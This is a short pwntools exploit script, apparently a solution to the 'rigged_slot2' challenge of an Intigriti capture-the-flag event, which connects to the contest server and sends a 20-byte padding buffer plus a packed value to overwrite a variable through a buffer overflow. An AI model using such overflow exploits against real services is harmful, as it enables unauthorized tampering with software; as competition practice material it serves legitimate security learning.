Files
2024-11-27 22:23:08 +03:00

18 lines
289 B
Python

#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./rigged_slot2", checksec=False)
# r = process()
r = remote("riggedslot2.ctf.intigriti.io", 1337)
# funcs
s = lambda a: r.sendlineafter(b":", a)
# buf
buf = b"A"*20
buf += p64(1337421)
s(buf)
s(b"1")
r.interactive()